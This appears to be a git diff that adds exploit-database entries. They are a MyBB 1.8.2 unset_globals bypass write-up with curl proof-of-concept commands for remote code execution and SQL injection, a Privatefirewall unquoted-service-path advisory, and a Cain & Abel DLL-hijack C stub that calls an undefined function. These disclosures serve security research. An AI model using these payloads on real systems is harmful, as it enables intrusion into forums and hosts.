Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
||||
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
||||
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
||||
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||
|
||||
Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
||||
CONTACT: research@vulnerability-lab.com
|
||||
|
||||
COMPANY: Evolution Security GmbH
|
||||
BUSINESS: www.evolution-sec.com
|
||||
|
||||
|
304
platforms/php/webapps/35323.md
Executable file
304
platforms/php/webapps/35323.md
Executable file
|
@ -0,0 +1,304 @@
|
|||
# Exploit Title: MyBB <= 1.8.2 unset_globals() Function Bypass and Remote
|
||||
Code Execution Vulnerability
|
||||
# Date: 2014-11-21
|
||||
# Exploit Author: Taoguang Chen
|
||||
# Vendor Homepage: twitter.com/chtg57
|
||||
# Software Link: www.mybb.com
|
||||
# Version: MyBB 1.8 <= 1.8.2 and MyBB 1.6 <= 1.6.15
|
||||
|
||||
MyBB had released 1.8.3 and 1.6.16 to fixed this vulnerability.
|
||||
|
||||
Advisory: https://gist.github.com/chtg/e9824db42a8edf302b0e
|
||||
|
||||
|
||||
|
||||
|
||||
#MyBB <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution Vulnerability
|
||||
|
||||
Taoguang Chen <[@chtg](http://github.com/chtg)> - 2014.03.06
|
||||
|
||||
> MyBB's unset_globals() function can be bypassed under special conditions and it is possible to allows remote code execution.
|
||||
|
||||
##I. MyBB's unset_globals() Function Bypass
|
||||
|
||||
When PHP's register\_globals configuration set on, MyBB will call unset\_globals() function, all global variables registered by PHP from $\_POST, $\_GET, $\_FILES, and $\_COOKIE arrays will be destroyed.
|
||||
|
||||
```
|
||||
if(@ini_get("register_globals") == 1)
|
||||
{
|
||||
$this->unset_globals($_POST);
|
||||
$this->unset_globals($_GET);
|
||||
$this->unset_globals($_FILES);
|
||||
$this->unset_globals($_COOKIE);
|
||||
}
|
||||
...
|
||||
}
|
||||
...
|
||||
function unset_globals($array)
|
||||
{
|
||||
if(!is_array($array))
|
||||
{
|
||||
return;
|
||||
}
|
||||
|
||||
foreach(array_keys($array) as $key)
|
||||
{
|
||||
unset($GLOBALS[$key]);
|
||||
unset($GLOBALS[$key]); // Double unset to circumvent the zend_hash_del_key_or_index hole in PHP <4.4.3 and <5.1.4
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
But unset\_globals() function can be bypassed.
|
||||
|
||||
###i) $\_GET, $\_FILES, or $\_COOKIE Array was Destroyed
|
||||
|
||||
```
|
||||
foo.php?_COOKIE=1
|
||||
// $_GET['_COOKIE']
|
||||
```
|
||||
|
||||
When $_GET['\_COOKIE']=1 is sent, unset\_globals() will destroy $GLOBALS['\_COOKIE'].
|
||||
|
||||
```
|
||||
$this->unset_globals($_GET);
|
||||
...
|
||||
}
|
||||
...
|
||||
function unset_globals($array)
|
||||
{
|
||||
...
|
||||
foreach(array_keys($array) as $key)
|
||||
{
|
||||
unset($GLOBALS[$key]);
|
||||
```
|
||||
|
||||
This means $\_COOKIE array will be destroyed. This also means all global variables registered by PHP from $\_COOKIE array will be destroyed because them will not be handled by unset().
|
||||
|
||||
```
|
||||
$this->unset_globals($_COOKIE);
|
||||
}
|
||||
...
|
||||
}
|
||||
...
|
||||
function unset_globals($array)
|
||||
{
|
||||
if(!is_array($array))
|
||||
{
|
||||
return;
|
||||
}
|
||||
```
|
||||
|
||||
By the same token, if $\_GET or $\_FILES array was destroyed via unset\_globals(), the corresponding global variables registered by PHP will not be destroyed.
|
||||
|
||||
###ii) $GLOBALS Array was Destroyed
|
||||
|
||||
```
|
||||
foo.php?GLOBALS=1
|
||||
// $_GET['GLOBALS']
|
||||
```
|
||||
|
||||
When $\_GET['GLOBALS']=1 is sent, unset\_globals() will destroy $GLOBALS['GLOBALS']. This means $GLOBALS array will be destroyed.
|
||||
|
||||
$GLOBALS array is a automatic global variable, and binding with global symbol table, you can use $GLOBALS['key'] to access or control a global variable in all scopes throughout a script. This means that the binding between the $GLOBALS array and the global symbol table will be broken because $GLOBALS array has been destroyed. This also means all variables registered by PHP from $\_GET, $\_FILES and $\_COOKIE arrays will not be destroyed.
|
||||
|
||||
By the same token, when $\_POST['GLOBALS'], $\_FLIES['GLOBALS'], or $\_COOKIE['GLOBALS'] is sent, unset\_globals() will destroy $GLOBALS array, then the corresponding global variables registered by PHP will not be destroyed.
|
||||
|
||||
In fact, MyBB is already aware of the problem:
|
||||
|
||||
```
|
||||
$protected = array("_GET", "_POST", "_SERVER", "_COOKIE", "_FILES", "_ENV", "GLOBALS");
|
||||
foreach($protected as $var)
|
||||
{
|
||||
if(isset($_REQUEST[$var]) || isset($_FILES[$var]))
|
||||
{
|
||||
die("Hacking attempt");
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Unfortunately, there is a small hole yet:-)
|
||||
|
||||
$\_REQUEST is an associative array that by default contains mix of $\_GET, $\_POST, and $\_COOKIE arrays data.
|
||||
|
||||
But PHP >= 5.3 introduced request\_order configuration, the directive affects the contents of $\_REQUEST array.
|
||||
|
||||
```
|
||||
request_order = "GP"
|
||||
```
|
||||
|
||||
This is recommended setting in php.ini. Set it to "GP" means only $\_GET and $\_POST arrays data is merged into $\_REQUEST array without $\_COOKIE array data.
|
||||
|
||||
So, it is possible that sent $\_COOKIE['GLOBALS'], then bypass unset\_globals() function in PHP 5.3.
|
||||
|
||||
##II. Remote Code Execution Vulnerability
|
||||
|
||||
There is one interesting method in MyBB:
|
||||
|
||||
```
|
||||
class MyBB {
|
||||
...
|
||||
function __destruct()
|
||||
{
|
||||
// Run shutdown function
|
||||
if(function_exists("run_shutdown"))
|
||||
{
|
||||
run_shutdown();
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Look into run\_shutdown() function:
|
||||
|
||||
```
|
||||
function run_shutdown()
|
||||
{
|
||||
global $config, $db, $cache, $plugins, $error_handler, $shutdown_functions, $shutdown_queries, $done_shutdown, $mybb;
|
||||
...
|
||||
// Run any shutdown functions if we have them
|
||||
if(is_array($shutdown_functions))
|
||||
{
|
||||
foreach($shutdown_functions as $function)
|
||||
{
|
||||
call_user_func_array($function['function'], $function['arguments']);
|
||||
}
|
||||
}
|
||||
|
||||
$done_shutdown = true;
|
||||
}
|
||||
```
|
||||
|
||||
The $shutdown\_functions was initialized via add\_shutdown() function in init.php:
|
||||
|
||||
```
|
||||
// Set up any shutdown functions we need to run globally
|
||||
add_shutdown('send_mail_queue');
|
||||
```
|
||||
|
||||
But add\_shutdown() function initialization handler is wrong:
|
||||
|
||||
```
|
||||
function add_shutdown($name, $arguments=array())
|
||||
{
|
||||
global $shutdown_functions;
|
||||
|
||||
if(!is_array($shutdown_functions))
|
||||
{
|
||||
$shutdown_functions = array();
|
||||
}
|
||||
|
||||
if(!is_array($arguments))
|
||||
{
|
||||
$arguments = array($arguments);
|
||||
}
|
||||
|
||||
if(is_array($name) && method_exists($name[0], $name[1]))
|
||||
{
|
||||
$shutdown_functions[] = array('function' => $name, 'arguments' => $arguments);
|
||||
return true;
|
||||
}
|
||||
else if(!is_array($name) && function_exists($name))
|
||||
{
|
||||
$shutdown_functions[] = array('function' => $name, 'arguments' => $arguments);
|
||||
return true;
|
||||
}
|
||||
|
||||
return false;
|
||||
}
|
||||
```
|
||||
|
||||
In the above code we see that run\_shutdown() function is vulnerable because $shutdown\_functions is initialized correctly and therefore result in arbitrary code execution.
|
||||
|
||||
##III. Proof of Concept
|
||||
|
||||
When request\_order = "GP" and register\_globals = On, remote code execution by just using curl on the command line:
|
||||
|
||||
```
|
||||
$ curl --cookie "GLOBALS=1; shutdown_functions[0][function]=phpinfo; shutdown_functions[0][arguments][]=-1" http://www.target/
|
||||
```
|
||||
|
||||
##IV. P.S.I
|
||||
|
||||
**Another case to exploit the vulnerability:**
|
||||
|
||||
When PHP's "disable\_functions" configuration directive disable ini\_get() function:
|
||||
|
||||
```
|
||||
disable_functions = ini_get
|
||||
```
|
||||
|
||||
The unset\_globals() function will not be called that regardless of register\_globals set on or off.
|
||||
|
||||
```
|
||||
if(@ini_get("register_globals") == 1)
|
||||
{
|
||||
$this->unset_globals($_POST);
|
||||
$this->unset_globals($_GET);
|
||||
$this->unset_globals($_FILES);
|
||||
$this->unset_globals($_COOKIE);
|
||||
}
|
||||
```
|
||||
|
||||
**Proof of Concept**
|
||||
|
||||
Works on disable\_functions = ini\_get and register\_globals = On:
|
||||
|
||||
```
|
||||
index.php?shutdown_functions[0][function]=phpinfo&shutdown_functions[0][arguments][]=-1
|
||||
```
|
||||
|
||||
##V. P.S.II
|
||||
|
||||
**SQL injection vulnerability via run\_shutdown() function**
|
||||
|
||||
```
|
||||
function run_shutdown()
|
||||
{
|
||||
global $config, $db, $cache, $plugins, $error_handler, $shutdown_functions, $shutdown_queries, $done_shutdown, $mybb;
|
||||
...
|
||||
// We have some shutdown queries needing to be run
|
||||
if(is_array($shutdown_queries))
|
||||
{
|
||||
// Loop through and run them all
|
||||
foreach($shutdown_queries as $query)
|
||||
{
|
||||
$db->query($query);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
The $shutdown\_queries was initialized in global.php:
|
||||
|
||||
```
|
||||
$shutdown_queries = array();
|
||||
```
|
||||
|
||||
But not all files are included global.php, such as css.php:
|
||||
|
||||
```
|
||||
require_once "./inc/init.php";
|
||||
```
|
||||
|
||||
There is not included global.php, and $shutdown\_queries is uninitialized, with the result that there is a SQL injection vulnerability.
|
||||
|
||||
**Proof of Concept**
|
||||
|
||||
Works on request\_order = "GP" and register\_globals = On:
|
||||
|
||||
```
|
||||
$ curl --cookie "GLOBALS=1; shutdown_queries[]=SQL_Inj" http://www.target/css.php
|
||||
```
|
||||
|
||||
Works on disable\_functions = ini\_get and register\_globals = On:
|
||||
|
||||
```
|
||||
css.php?shutdown_queries[]=SQL_Inj
|
||||
```
|
||||
|
||||
##VI. Disclosure Timeline
|
||||
|
||||
* 2014.03.06 - Notified the MyBB devs via security contact form
|
||||
* 2014.11.16 - Renotified the MyBB devs via Private Inquiries forum because no reply
|
||||
* 2014.11.20 - MyBB developers released MyBB 1.8.3 and MyBB 1.6.16
|
||||
* 2014.11.21 - Public Disclosure
|
68
platforms/windows/local/35322.txt
Executable file
68
platforms/windows/local/35322.txt
Executable file
|
@ -0,0 +1,68 @@
|
|||
Privacyware Privatefirewall 7.0 Unquoted Service Path Privilege Escalation
|
||||
|
||||
|
||||
Vendor: PWI, Inc.
|
||||
Product web page: http://www.privacyware.com
|
||||
Affected version: 7.0.30.3
|
||||
|
||||
|
||||
Summary: Privatefirewall multi-layered endpoint security software protects
|
||||
32 and 64 bit Windows desktops and servers from malware and unauthorized use.
|
||||
Personal firewall, packet inspection, URL filtering, anti-logger, process
|
||||
monitor, and application/system behavior modeling and anomaly detection
|
||||
components stop hackers, spyware, viruses and other forms of malware before
|
||||
they can cause damage.
|
||||
|
||||
Desc: Privatefirewall suffers from an unquoted search path issue impacting
|
||||
the Core Service 'PFNet' service for Windows deployed as part of Privatefirewall
|
||||
bundle. This could potentially allow an authorized but non-privileged local
|
||||
user to execute arbitrary code with elevated privileges on the system. A
|
||||
successful attempt would require the local user to be able to insert their
|
||||
code in the system root path undetected by the OS or other security applications
|
||||
where it could potentially be executed during application startup or reboot.
|
||||
If successful, the local user?s code would execute with the elevated privileges
|
||||
of the application.
|
||||
|
||||
Tested on: Microsoft Windows 7 Professional SP1 (EN)
|
||||
Microsoft Windows 7 Ultimate SP1 (EN)
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2014-5209
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5209.php
|
||||
|
||||
|
||||
09.11.2014
|
||||
|
||||
---
|
||||
|
||||
|
||||
C:\Users\user>sc qc PFNet
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: PFNet
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe
|
||||
LOAD_ORDER_GROUP : TDI
|
||||
TAG : 0
|
||||
DISPLAY_NAME : Privacyware network service
|
||||
DEPENDENCIES : RpcSs
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
|
||||
--
|
||||
|
||||
C:\Users\user>icacls "C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe"
|
||||
C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe NT AUTHORITY\SYSTEM:(I)(F)
|
||||
BUILTIN\Administrators:(I)(F)
|
||||
BUILTIN\Users:(I)(RX)
|
||||
|
||||
Successfully processed 1 files; Failed processing 0 files
|
||||
|
||||
|
||||
--
|
19
platforms/windows/remote/35318.c
Executable file
19
platforms/windows/remote/35318.c
Executable file
|
@ -0,0 +1,19 @@
|
|||
source: http://www.securityfocus.com/bid/46239/info
|
||||
|
||||
Cain & Abel is prone to an arbitrary-code-execution vulnerability.
|
||||
|
||||
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
|
||||
|
||||
Cain & Abel 2.7.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
#include <windows.h>
|
||||
#define DllExport __declspec (dllexport)
|
||||
DllExport void DwmSetWindowAttribute() { egg(); }
|
||||
|
||||
int pwnme()
|
||||
{
|
||||
MessageBox(0, "dll hijacked !! ", "Dll Message", MB_OK);
|
||||
exit(0);
|
||||
return 0;
|
||||
}
|
||||
|
Loading…
Add table
Reference in a new issue